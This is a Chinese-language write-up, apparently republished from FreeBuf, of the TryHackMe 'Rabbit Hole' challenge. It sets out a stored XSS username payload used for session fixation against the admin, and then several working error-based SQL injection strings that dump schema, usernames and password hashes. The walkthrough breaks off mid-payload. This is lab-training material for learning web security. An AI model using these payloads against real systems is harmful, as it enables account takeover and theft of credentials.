Rabbit Hole TryHackMe
文章描述了一个Web安全挑战的过程,包括扫描端口、发现XSS漏洞和SQL注入漏洞,并通过漏洞利用获取数据库信息和管理员权限的过程。 2025-10-12 05:25:48 Author: www.freebuf.com(查看原文) 阅读量:96 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

兔子洞,有趣的名字,每次打开挑战都挑出来,今天做了它

首先扫描端口

1760195152_68ea72507a6902e23b003.png!small

没有什么问题,提示没有http-only,可以注释下xss漏洞,首先访问下80

提示

1760195277_68ea72cd351b06ba0d02c.png!small

尝试login一下,提示不能使用暴力破解

login页面存在post参数username和password

尝试使用sqlmap注入一下

但是已经怀疑是兔子洞了

sqlmap先跑着,然后尝试先register一个账号

登录之后发现是

1760196466_68ea777249b6b4c14bb87.png!small

说明除了我创建的账号有3个账号,1个是admin

然后发现自己的用户名被显示到了页面上可以尝试使用xss漏洞

重点;再次登录并退出后,我们会发现会话 Cookie 保持不变

1760197660_68ea7c1c6dc40faaea336.png!small

可以和明显的看到每一分钟admin账号会登录一次,所以尝试一下替换admin的cookie

这时候将自己的用户名修改为:

<script> document.cookie = "PHPSESSID=a; path=/"; location.reload(); // Optional: Reload to make sure the session ID is used in the current session. </script>

登录一次将自己的用户名放在显示页面

1760198339_68ea7ec3c8fe67add52fb.png!small

登录之后发现存在一个sql注入,开始转入

sql注入部分,经过检查发现双引号

先进行联合查询

1760199009_68ea8161ddf09e4ca766a.png!small

1760199038_68ea817e24227edffd2e1.png!small

说明有两列

1" and                        updatexml(1,concat(0x7e,substr((select(group_concat(schema_name))from(information_schema.schemata)),1,10),0x7e),1)-- +

知道了table_schem为informatio

-1" and updatexml(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=database())), 'x')-- +

爆一下表名是1760200940_68ea88eca39893276eb2e.png!small

即users和logins

接着爆列名

-1" and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name='users')), 'x')-- +

1760201116_68ea899cbcb721dbce472.png!small

先查用户名

-1" and updatexml(1, concat(0x7e, (select group_concat(username) from users)), 'x')-- +

~admin,foo,bar,1

好像没有显示全,先不管它,查看下password

-1" and updatexml(1, concat(0x7e, (select group_concat(password) from users)), 'x')-- +

SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~0e3ab8e45ac1163c2343990e427c...'

发现显示不全,修改句子,只看下password

1" UNION SELECT 1,SUBSTRING((SELECT

免责声明

1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。

3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/web/452311.html
如有侵权请联系:admin#unsafe.sh